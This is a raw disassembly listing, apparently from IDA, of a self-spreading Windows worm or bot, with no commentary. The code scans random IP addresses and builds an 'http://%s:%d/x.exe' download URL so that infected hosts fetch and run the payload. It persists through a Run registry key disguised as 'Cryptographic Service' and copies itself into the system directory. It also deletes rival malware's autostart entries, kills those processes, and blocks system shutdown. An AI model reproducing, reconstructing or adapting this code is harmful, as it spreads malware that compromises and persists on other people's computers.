var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_31421190
		push	offset loc_31422CD0
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		sub	esp, 64h
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_70], offset aU10x ; "u10x"
		mov	[ebp+var_6C], offset aU11x ; "u11x"
		mov	[ebp+var_68], offset aU12x ; "u12x"
		mov	[ebp+var_64], offset aU13x ; "u13x"
		mov	[ebp+var_60], offset aU14x ; "u14x"
		mov	[ebp+var_5C], offset aU15x ; "u15x"
		mov	[ebp+var_58], offset aU16x ; "u16x"
		mov	[ebp+var_54], offset aU17x ; "u17x"
		mov	[ebp+var_50], offset aU18x ; "u18x"
		mov	[ebp+var_4C], offset aU8 ; "u8"
		mov	[ebp+var_48], offset aU9 ; "u9"
		mov	[ebp+var_44], offset aU10 ; "u10"
		mov	[ebp+var_40], offset aU11 ; "u11"
		mov	[ebp+var_3C], offset aU12 ; "u12"
		mov	[ebp+var_38], offset aU13 ; "u13"
		mov	[ebp+var_34], offset aU13i ; "u13i"
		mov	[ebp+var_30], offset aU14 ; "u14"
		mov	[ebp+var_2C], offset aU15 ; "u15"
		mov	[ebp+var_28], offset aU16 ; "u16"
		mov	[ebp+var_24], offset aU17 ; "u17"
		mov	[ebp+var_20], offset aU18 ; "u18"
		mov	[ebp+var_1C], offset aU19 ; "u19"
		push	offset aU192x	; "u19-2x"
		xor	edi, edi
		push	edi
		push	1
		push	edi
		call	dword_3142106C	; CreateEventA
		mov	dword_31424FF8,	eax
		mov	[ebp+var_4], edi
		mov	[ebp+var_74], edi


loc_3142248B:				; CODE XREF: sub_314223B2+EFj
		cmp	[ebp+var_74], 9
		jnb	short loc_314224A3
		mov	eax, [ebp+var_74]
		push	[ebp+eax*4+var_70]
		call	sub_3142204E
		pop	ecx
		inc	[ebp+var_74]
		jmp	short loc_3142248B
; ---------------------------------------------------------------------------


loc_314224A3:				; CODE XREF: sub_314223B2+DDj
		mov	[ebp+var_74], edi


loc_314224A6:				; CODE XREF: sub_314223B2+10Aj
		cmp	[ebp+var_74], 0Dh
		jnb	short loc_314224BE
		mov	eax, [ebp+var_74]
		push	[ebp+eax*4+var_4C]
		call	sub_31421F29
		pop	ecx
		inc	[ebp+var_74]
		jmp	short loc_314224A6
; ---------------------------------------------------------------------------


loc_314224BE:				; CODE XREF: sub_314223B2+F8j
		cmp	[ebp+arg_0], edi
		jz	short loc_314224FC
		push	offset aWs2_32	; "ws2_32"
		mov	esi, dword_314210A8
		call	esi	; LoadLibraryA
		push	offset aWininet	; "wininet"
		call	esi	; LoadLibraryA
		push	offset aMsvcrt	; "msvcrt"
		call	esi	; LoadLibraryA
		push	offset aAdvapi32 ; "advapi32"
		call	esi	; LoadLibraryA
		push	offset aUser32	; "user32"
		call	esi	; LoadLibraryA
		push	offset aUterm192 ; "uterm19-2"
		call	sub_31421F29
		pop	ecx
		mov	dword_31424FF4,	eax


loc_314224FC:				; CODE XREF: sub_314223B2+10Fj
		call	sub_31422308
		push	edi
		push	offset sub_314221C4
		call	sub_31421F38
		push	edi
		push	offset sub_314216A2
		call	sub_31421F38
		push	edi
		push	offset loc_3142276E
		call	sub_31421F38
		add	esp, 18h


loc_31422525:				; CODE XREF: sub_314223B2+18Ej
		call	sub_3142239E
		test	eax, eax
		jnz	short loc_31422542
		push	edi
		call	dword_31421018	; AbortSystemShutdownA
		push	1388h
		call	dword_31421094	; Sleep
		jmp	short loc_31422525
; ---------------------------------------------------------------------------


loc_31422542:				; CODE XREF: sub_314223B2+17Aj
		or	[ebp+var_4], 0FFFFFFFFh
		call	nullsub_2
		xor	eax, eax
		mov	ecx, [ebp+var_10]
		mov	large fs:0, ecx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	4
sub_314223B2	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142255F	proc near		; DATA XREF: sub_314225C3+55o
					; sub_3142264B+6Ao ...

var_1		= byte ptr -1
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	byte ptr [ebp+arg_0], 7Fh
		jnz	short loc_3142256E
		push	1
		pop	eax
		jmp	short locret_314225BF
; ---------------------------------------------------------------------------


loc_3142256E:				; CODE XREF: sub_3142255F+8j
		mov	al, byte ptr [ebp+arg_0+3]
		push	ebx
		push	esi
		mov	[ebp+var_1], al
		xor	bl, bl


loc_31422578:				; CODE XREF: sub_3142255F+5Aj
		call	sub_3142239E
		test	eax, eax
		jnz	short loc_314225BB
		call	sub_31422038
		test	eax, eax
		jz	short loc_314225BB
		cmp	[ebp+var_1], bl
		jz	short loc_314225B4
		mov	byte ptr [ebp+arg_0+3],	bl
		push	[ebp+arg_0]
		call	sub_31421801
		movzx	esi, word_3142500C
		pop	ecx
		call	dword_314210FC	; rand
		cdq
		idiv	esi
		add	edx, esi
		push	edx
		call	dword_31421094	; Sleep


loc_314225B4:				; CODE XREF: sub_3142255F+2Ej
		inc	bl
		cmp	bl, 0FFh
		jb	short loc_31422578


loc_314225BB:				; CODE XREF: sub_3142255F+20j
					; sub_3142255F+29j
		pop	esi
		xor	eax, eax
		pop	ebx

locret_314225BF:			; CODE XREF: sub_3142255F+Dj
		leave
		retn	4
sub_3142255F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314225C3	proc near		; DATA XREF: sub_3142264B+7Eo
					; UPX0:31422803o

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		cmp	byte ptr [ebp+arg_0], 7Fh
		jnz	short loc_314225D1
		push	1
		pop	eax
		jmp	short loc_31422647
; ---------------------------------------------------------------------------


loc_314225D1:				; CODE XREF: sub_314225C3+7j
		push	ebx
		push	esi
		push	edi
		call	sub_31421EFB
		mov	esi, dword_314210FC
		xor	ebx, ebx


loc_314225E1:				; CODE XREF: sub_314225C3+7Dj
		call	sub_3142239E
		test	eax, eax
		jnz	short loc_31422642
		call	sub_31422038
		test	eax, eax
		jz	short loc_31422642
		call	esi	; rand
		mov	byte ptr [ebp+arg_0+2],	al
		call	esi	; rand
		push	offset dword_31425004
		mov	byte ptr [ebp+arg_0+3],	al
		call	dword_314210D4	; InterlockedIncrement
		push	[ebp+arg_0]
		call	sub_31421801
		test	eax, eax
		pop	ecx
		jnz	short loc_31422624
		push	[ebp+arg_0]
		push	offset sub_3142255F
		call	sub_31421F52
		pop	ecx
		pop	ecx


loc_31422624:				; CODE XREF: sub_314225C3+50j
		movzx	edi, word_3142500C
		call	esi	; rand
		cdq
		idiv	edi
		add	edx, edi
		push	edx
		call	dword_31421094	; Sleep
		inc	ebx
		cmp	ebx, 8000h
		jl	short loc_314225E1


loc_31422642:				; CODE XREF: sub_314225C3+25j
					; sub_314225C3+2Ej
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx


loc_31422647:				; CODE XREF: sub_314225C3+Cj
		pop	ebp
		retn	4
sub_314225C3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142264B	proc near		; DATA XREF: UPX0:3142281Bo

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		call	sub_31421EFB
		call	sub_3142239E
		test	eax, eax
		jnz	loc_31422704
		push	ebx
		mov	ebx, dword_31421094
		push	esi
		mov	esi, dword_314210FC
		push	edi


loc_31422671:				; CODE XREF: sub_3142264B+48j
					; sub_3142264B+B0j
		call	esi	; rand
		mov	byte ptr [ebp+var_4+1],	al
		call	esi	; rand
		mov	byte ptr [ebp+var_4+3],	al
		call	esi	; rand
		mov	byte ptr [ebp+var_4+2],	al


loc_31422680:				; CODE XREF: sub_3142264B+3Cj
		call	esi	; rand
		cmp	al, 7Fh
		mov	byte ptr [ebp+var_4], al
		jz	short loc_31422680
		call	sub_31421FF9
		mov	edi, [ebp+var_4]
		cmp	edi, eax
		jz	short loc_31422671
		call	sub_31422038
		test	eax, eax
		jz	short loc_314226DC
		push	offset dword_31425004
		call	dword_314210D4	; InterlockedIncrement
		push	edi
		call	sub_31421801
		test	eax, eax
		pop	ecx
		jnz	short loc_314226E3
		push	edi
		push	offset sub_3142255F
		call	sub_31421F52
		pop	ecx
		mov	[ebp+var_8], 4
		pop	ecx


loc_314226C8:				; CODE XREF: sub_3142264B+8Dj
		push	edi
		push	offset sub_314225C3
		call	sub_31421F52
		dec	[ebp+var_8]
		pop	ecx
		pop	ecx
		jnz	short loc_314226C8
		jmp	short loc_314226E3
; ---------------------------------------------------------------------------


loc_314226DC:				; CODE XREF: sub_3142264B+51j
		push	2710h
		call	ebx	; Sleep


loc_314226E3:				; CODE XREF: sub_3142264B+67j
					; sub_3142264B+8Fj
		movzx	edi, word_3142500C
		call	esi	; rand
		cdq
		idiv	edi
		add	edx, edi
		push	edx
		call	ebx	; Sleep
		call	sub_3142239E
		test	eax, eax
		jz	loc_31422671
		pop	edi
		pop	esi
		pop	ebx


loc_31422704:				; CODE XREF: sub_3142264B+11j
		push	0
		call	dword_314210D0	; ExitThread
		xor	eax, eax
		leave
		retn	4
sub_3142264B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31422712	proc near		; CODE XREF: UPX0:314227E0p
					; UPX0:loc_31422846p

var_50		= byte ptr -50h
var_28		= byte ptr -28h

		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		push	esi
		call	sub_31421FF9
		push	eax
		call	dword_3142115C	; inet_ntoa
		mov	esi, dword_31421068
		push	eax
		lea	eax, [ebp+var_28]
		push	eax
		call	esi	; lstrcpy
		push	dword_31424FFC
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_50]
		push	offset aHttpSDX_exe ; "http://%s:%d/x.exe"
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 10h
		lea	eax, [ebp+var_50]
		push	eax
		push	offset word_314242BA
		call	esi	; lstrcpy
		push	offset byte_314242B8
		call	dword_31421084	; lstrlen
		mov	byte_314242B8[eax], 0DFh
		pop	esi
		leave
		retn
sub_31422712	endp

; ---------------------------------------------------------------------------


loc_3142276E:				; DATA XREF: sub_314223B2+166o
		push	ecx
		push	ecx
		push	ebx
		push	ebp
		push	esi
		xor	ebx, ebx
		push	edi
		mov	dword_31425004,	ebx
		call	sub_31422038
		mov	esi, dword_31421094
		mov	edi, 1388h
		test	eax, eax
		jnz	short loc_3142279C


loc_31422790:				; CODE XREF: UPX0:3142279Aj
		push	edi
		call	esi	; Sleep
		call	sub_31422038
		test	eax, eax
		jz	short loc_31422790


loc_3142279C:				; CODE XREF: UPX0:3142278Ej
		lea	eax, [esp+14h]
		push	ebx
		push	eax
		call	dword_31421130	; InternetGetConnectedState
		test	byte ptr [esp+14h], 2
		push	50h
		mov	dword_31425008,	ebx
		pop	ebp
		mov	word_3142500C, 96h
		jz	short loc_314227D9
		mov	dword_31425008,	1
		mov	ebp, 15Eh
		mov	word_3142500C, 14h


loc_314227D9:				; CODE XREF: UPX0:314227BFj
		call	sub_31421FF9
		mov	ebx, eax
		call	sub_31422712
		cmp	ebx, 100007Fh
		jz	short loc_314227FA
		push	ebx
		push	offset sub_3142255F
		call	sub_31421F52
		pop	ecx
		pop	ecx


loc_314227FA:				; CODE XREF: UPX0:314227EBj
		mov	dword ptr [esp+10h], 4


loc_31422802:				; CODE XREF: UPX0:31422813j
		push	ebx
		push	offset sub_314225C3
		call	sub_31421F52
		dec	dword ptr [esp+18h]
		pop	ecx
		pop	ecx
		jnz	short loc_31422802
		test	ebp, ebp
		jle	short loc_3142282A


loc_31422819:				; CODE XREF: UPX0:31422828j
		push	0
		push	offset sub_3142264B
		call	sub_31421F52
		pop	ecx
		dec	ebp
		pop	ecx
		jnz	short loc_31422819


loc_3142282A:				; CODE XREF: UPX0:31422817j
					; UPX0:31422836j ...
		call	sub_31422038
		test	eax, eax
		jz	short loc_31422838
		push	edi
		call	esi	; Sleep
		jmp	short loc_3142282A
; ---------------------------------------------------------------------------


loc_31422838:				; CODE XREF: UPX0:31422831j
					; UPX0:31422844j
		call	sub_31422038
		test	eax, eax
		jnz	short loc_31422846
		push	edi
		call	esi	; Sleep
		jmp	short loc_31422838
; ---------------------------------------------------------------------------


loc_31422846:				; CODE XREF: UPX0:3142283Fj
		call	sub_31422712
		jmp	short loc_3142282A

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142284D	proc near		; CODE XREF: sub_314229E6+93p
					; sub_31422B67+11Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		lea	eax, [ebp+arg_4]
		push	eax
		push	0F003Fh
		push	0
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_3142100C	; RegOpenKeyExA
		test	eax, eax
		jnz	short loc_31422880
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	dword_31421010	; RegDeleteValueA
		push	[ebp+arg_4]
		call	dword_31421014	; RegCloseKey


loc_31422880:				; CODE XREF: sub_3142284D+1Cj
		pop	ebp
		retn
sub_3142284D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31422882	proc near		; CODE XREF: sub_314221C4+33p
					; sub_314229E6+84p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	eax, [ebp+arg_10]
		push	esi
		mov	[ebp+var_4], eax
		lea	eax, [ebp+arg_10]
		push	eax
		xor	esi, esi
		push	0F003Fh
		push	esi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_3142100C	; RegOpenKeyExA
		test	eax, eax
		jz	short loc_314228AE
		push	1
		pop	eax
		jmp	short loc_314228D8
; ---------------------------------------------------------------------------


loc_314228AE:				; CODE XREF: sub_31422882+25j
		lea	eax, [ebp+var_4]
		push	eax
		lea	eax, [ebp+arg_4]
		push	[ebp+arg_C]
		push	eax
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_10]
		call	dword_31421008	; RegQueryValueExA
		test	eax, eax
		jz	short loc_314228CD
		push	2
		pop	esi


loc_314228CD:				; CODE XREF: sub_31422882+46j
		push	[ebp+arg_10]
		call	dword_31421014	; RegCloseKey
		mov	eax, esi


loc_314228D8:				; CODE XREF: sub_31422882+2Aj
		pop	esi
		leave
		retn
sub_31422882	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314228DB	proc near		; CODE XREF: sub_31422A9B+96p
					; sub_31422B67+7Cp ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		lea	eax, [ebp+arg_4]
		push	esi
		push	eax
		push	esi
		push	0F003Fh
		push	esi
		push	esi
		push	esi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_31421000	; RegCreateKeyExA
		test	eax, eax
		jz	short loc_31422904
		push	1
		pop	eax
		jmp	short loc_3142292B
; ---------------------------------------------------------------------------


loc_31422904:				; CODE XREF: sub_314228DB+22j
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	1
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	dword_31421004	; RegSetValueExA
		test	eax, eax
		jz	short loc_31422920
		push	2
		pop	esi


loc_31422920:				; CODE XREF: sub_314228DB+40j
		push	[ebp+arg_4]
		call	dword_31421014	; RegCloseKey
		mov	eax, esi


loc_3142292B:				; CODE XREF: sub_314228DB+27j
		pop	esi
		pop	ebp
		retn
sub_314228DB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142292E	proc near		; CODE XREF: sub_314229E6+9Fp

var_128		= dword	ptr -128h
var_120		= dword	ptr -120h
var_104		= byte ptr -104h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 128h
		push	ebx
		mov	ebx, [ebp+arg_0]
		push	esi
		push	ebx
		call	dword_31421084	; lstrlen
		mov	esi, eax
		dec	esi
		test	esi, esi
		jle	loc_314229E2


loc_3142294E:				; CODE XREF: sub_3142292E+27j
		cmp	byte ptr [esi+ebx], 5Ch
		jz	short loc_31422957
		dec	esi
		jns	short loc_3142294E


loc_31422957:				; CODE XREF: sub_3142292E+24j
		push	0
		push	2
		call	sub_31422D2C	; CreateToolhelp32Snapshot
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+arg_0], eax
		jz	short loc_314229E2
		push	128h
		lea	eax, [ebp+var_128]
		push	0
		push	eax
		call	sub_31422CD6	; memset
		add	esp, 0Ch
		lea	eax, [ebp+var_128]
		mov	[ebp+var_128], 128h
		push	eax
		push	[ebp+arg_0]
		call	sub_31422D26	; Process32First
		test	eax, eax
		jz	short loc_314229E2
		lea	esi, [esi+ebx+1]


loc_3142299F:				; CODE XREF: sub_3142292E+B2j
		lea	eax, [ebp+var_104]
		push	eax
		push	esi
		call	dword_31421104	; strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_314229CF
		push	[ebp+var_120]
		push	0
		push	1F0FFFh
		call	dword_314210B0	; OpenProcess
		push	0
		push	eax
		call	dword_31421060	; TerminateProcess


loc_314229CF:				; CODE XREF: sub_3142292E+83j
		lea	eax, [ebp+var_128]
		push	eax
		push	[ebp+arg_0]
		call	sub_31422D20	; Process32Next
		test	eax, eax
		jnz	short loc_3142299F


loc_314229E2:				; CODE XREF: sub_3142292E+1Aj
					; sub_3142292E+38j ...
		pop	esi
		pop	ebx
		leave
		retn
sub_3142292E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314229E6	proc near		; CODE XREF: UPX0:3142237Bp

var_13C		= byte ptr -13Ch
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 13Ch
		push	ebx
		push	esi
		lea	eax, [ebp+var_34]
		push	edi
		mov	[ebp+var_34], offset aWindowsSecurit ; "Windows	Security Manager"
		mov	[ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
		mov	[ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
		mov	[ebp+var_28], offset aBotLoader	; "Bot Loader"
		mov	[ebp+var_24], offset aSystray ;	"SysTray"
		mov	[ebp+var_20], offset aWinupdate	; "WinUpdate"
		mov	[ebp+var_1C], offset aWindowsUpdateS ; "Windows	Update Service"
		mov	[ebp+var_18], offset aAvserve_exe ; "avserve.exe"
		mov	[ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
		mov	[ebp+var_10], offset aMsConfigV13 ; "MS	Config v13"
		mov	[ebp+var_C], offset aWindowsUpdate ; "Windows Update"
		mov	[ebp+var_4], eax
		mov	[ebp+var_8], 0Bh
		mov	edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	esi, 80000002h


loc_31422A56:				; CODE XREF: sub_314229E6+AEj
		mov	eax, [ebp+var_4]
		push	104h
		mov	ebx, [eax]
		lea	eax, [ebp+var_13C]
		push	eax
		push	ebx
		push	edi
		push	esi
		call	sub_31422882
		add	esp, 14h
		test	eax, eax
		jnz	short loc_31422A8D
		push	ebx
		push	edi
		push	esi
		call	sub_3142284D
		lea	eax, [ebp+var_13C]
		push	eax
		call	sub_3142292E
		add	esp, 10h


loc_31422A8D:				; CODE XREF: sub_314229E6+8Ej
		add	[ebp+var_4], 4
		dec	[ebp+var_8]
		jnz	short loc_31422A56
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_314229E6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31422A9B	proc near		; CODE XREF: sub_31422B67+D1p
					; sub_31422B67+132p

var_78		= byte ptr -78h
var_14		= byte ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 78h
		cmp	[ebp+arg_0], 0
		jz	short loc_31422AB0
		push	[ebp+arg_0]
		call	dword_31421074	; DeleteFileA


loc_31422AB0:				; CODE XREF: sub_31422A9B+Aj
		lea	eax, [ebp+var_78]
		push	63h
		push	eax
		call	dword_3142108C	; GetSystemDirectoryA
		test	eax, eax
		jz	locret_31422B65
		push	esi
		call	dword_314210FC	; rand
		and	eax, 3
		add	eax, 5
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_31421F73
		mov	esi, dword_31421088
		pop	ecx
		pop	ecx
		lea	eax, [ebp+var_14]
		push	offset dword_314241F0
		push	eax
		call	esi	; lstrcat
		lea	eax, [ebp+var_78]
		push	offset dword_314241F8
		push	eax
		call	esi	; lstrcat
		lea	eax, [ebp+var_14]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		call	esi	; lstrcat
		lea	eax, [ebp+var_78]
		push	0
		push	eax
		push	[ebp+arg_4]
		call	dword_31421050	; CopyFileA
		lea	eax, [ebp+var_78]
		push	eax
		call	dword_31421084	; lstrlen
		inc	eax
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		push	offset aCryptographicS ; "Cryptographic	Service"
		push	offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	80000002h
		call	sub_314228DB
		add	esp, 14h
		push	dword_31424FF4
		call	dword_3142107C	; CloseHandle
		lea	eax, [ebp+var_78]
		push	0
		push	eax
		call	dword_31421054	; WinExec
		push	1F4h
		call	dword_31421094	; Sleep
		push	0
		call	dword_314210E0	; ExitProcess
		pop	esi

locret_31422B65:			; CODE XREF: sub_31422A9B+23j
		leave
		retn
sub_31422A9B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31422B67	proc near		; CODE XREF: UPX0:31422380p

var_E8		= byte ptr -0E8h
var_84		= byte ptr -84h
var_20		= byte ptr -20h

		push	ebp
		mov	ebp, esp
		sub	esp, 0E8h
		push	ebx
		push	esi
		push	edi
		lea	eax, [ebp+var_84]
		push	63h
		push	eax
		push	0
		call	dword_31421048	; GetModuleFileNameA
		test	eax, eax
		jz	loc_31422CA0
		and	dword_31425010,	0
		lea	eax, [ebp+var_20]
		push	1Dh
		push	eax
		mov	edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
		push	offset aId	; "ID"
		mov	esi, 80000002h
		push	edi
		push	esi
		call	sub_31422882
		add	esp, 14h
		test	eax, eax
		jz	short loc_31422BED
		call	dword_314210FC	; rand
		push	0Ah
		mov	ebx, offset aKjszoscitbkggy ; "kjszoscitbkggyijpu"
		cdq
		pop	ecx
		idiv	ecx
		add	edx, ecx
		push	edx
		push	ebx
		call	sub_31421F73
		pop	ecx
		pop	ecx
		push	ebx
		call	dword_31421084	; lstrlen
		inc	eax
		push	eax
		push	ebx
		push	offset aId	; "ID"
		push	edi
		push	esi
		call	sub_314228DB
		add	esp, 14h
		jmp	short loc_31422BFC
; ---------------------------------------------------------------------------


loc_31422BED:				; CODE XREF: sub_31422B67+4Dj
		lea	eax, [ebp+var_20]
		push	eax
		push	offset aKjszoscitbkggy ; "kjszoscitbkggyijpu"
		call	dword_31421068	; lstrcpy


loc_31422BFC:				; CODE XREF: sub_31422B67+84j
		lea	eax, [ebp+var_E8]
		push	63h
		push	eax
		push	offset aCryptographicS ; "Cryptographic	Service"
		push	offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	esi
		call	sub_31422882
		add	esp, 14h
		test	eax, eax
		jz	short loc_31422C42
		push	2
		push	offset a1	; "1"
		push	offset aClient	; "Client"
		push	edi
		push	esi
		call	sub_314228DB
		lea	eax, [ebp+var_84]
		push	eax
		push	0
		call	sub_31422A9B
		add	esp, 1Ch
		jmp	short loc_31422CA0
; ---------------------------------------------------------------------------


loc_31422C42:				; CODE XREF: sub_31422B67+B3j
		lea	eax, [ebp+var_84]
		push	eax
		lea	eax, [ebp+var_E8]
		push	eax
		call	dword_3142104C	; lstrcmpi
		test	eax, eax
		jnz	short loc_31422C8B
		lea	eax, [ebp+var_20]
		push	1Dh
		mov	ebx, offset aClient ; "Client"
		push	eax
		push	ebx
		push	edi
		push	esi
		call	sub_31422882
		add	esp, 14h
		test	eax, eax
		jnz	short loc_31422CA0
		push	ebx
		push	edi
		push	esi
		mov	dword_31425010,	1
		call	sub_3142284D
		add	esp, 0Ch
		jmp	short loc_31422CA0
; ---------------------------------------------------------------------------


loc_31422C8B:				; CODE XREF: sub_31422B67+F1j
		lea	eax, [ebp+var_84]
		push	eax
		lea	eax, [ebp+var_E8]
		push	eax
		call	sub_31422A9B
		pop	ecx
		pop	ecx


loc_31422CA0:				; CODE XREF: sub_31422B67+1Fj
					; sub_31422B67+D9j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31422B67	endp


; =============== S U B	R O U T	I N E =======================================



sub_31422CA5	proc near		; CODE XREF: sub_314211A0+CAp
					; sub_314215C7+11p ...

arg_0		= dword	ptr  4

		push	4
		push	1000h
		push	[esp+8+arg_0]
		push	0
		call	dword_31421044	; VirtualAlloc
		retn
sub_31422CA5	endp


; =============== S U B	R O U T	I N E =======================================



sub_31422CB9	proc near		; CODE XREF: sub_314211A0+10Bp
					; sub_314215C7+C0p

arg_0		= dword	ptr  4

		push	8000h
		push	0
		push	[esp+8+arg_0]
		call	dword_31421040	; VirtualFree
		retn
sub_31422CB9	endp

; ---------------------------------------------------------------------------
		align 10h


loc_31422CD0:				; DATA XREF: sub_31421422+Ao
					; sub_314223B2+Ao
		jmp	dword ptr loc_31421100

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_31422CD6	proc near		; CODE XREF: sub_31421801+128p
					; sub_31421801+134p ...
		jmp	dword_314210F8
sub_31422CD6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_31422CDC	proc near		; CODE XREF: sub_31421801+9Cp
					; sub_31421801+C5p ...
		jmp	dword_314210F4
sub_31422CDC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_31422CE2	proc near		; CODE XREF: sub_31421801+93p
					; sub_31421801+B2p ...
		jmp	dword_314210F0
sub_31422CE2	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_31422CF0	proc near		; CODE XREF: sub_31421801+8p

arg_0		= byte ptr  4

		push	ecx
		cmp	eax, 1000h
		lea	ecx, [esp+4+arg_0]
		jb	short loc_31422D10


loc_31422CFC:				; CODE XREF: sub_31422CF0+1Ej
		sub	ecx, 1000h
		sub	eax, 1000h
		test	[ecx], eax
		cmp	eax, 1000h
		jnb	short loc_31422CFC


loc_31422D10:				; CODE XREF: sub_31422CF0+Aj
		sub	ecx, eax
		mov	eax, esp
		test	[ecx], eax
		mov	esp, ecx
		mov	ecx, [eax]
		mov	eax, [eax+4]
		push	eax
		retn
sub_31422CF0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_31422D20	proc near		; CODE XREF: sub_3142292E+ABp
		jmp	dword_31421064
sub_31422D20	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_31422D26	proc near		; CODE XREF: sub_3142292E+64p
		jmp	dword_3142105C
sub_31422D26	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_31422D2C	proc near		; CODE XREF: sub_3142292E+2Dp
		jmp	dword_31421058
sub_31422D2C	endp

; ---------------------------------------------------------------------------
		db 2 dup(0CCh)
		dd 4B3h	dup(0)
dword_31424000	dd 206h, 2400h,	31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
					; DATA XREF: sub_31421422+112o
		dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
		dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
		dd 3072657Ah, 0
aMozilla4_0Co_0	db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
					; DATA XREF: sub_314215C7+84o
		align 10h
byte_31424080	db 0			; DATA XREF: sub_314216A2+1Br
off_31424081	dd offset dword_314241E4 ; DATA	XREF: sub_314216A2+23r
		align 2
		dd offset dword_314241D4
		dw 0C401h
		dd 1314241h, 314241B4h,	4241A000h, 41900131h, 80013142h
		dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
		dd 1314241h, 3142413Ch,	42417400h, 41D40131h, 30003142h
		dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
		dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
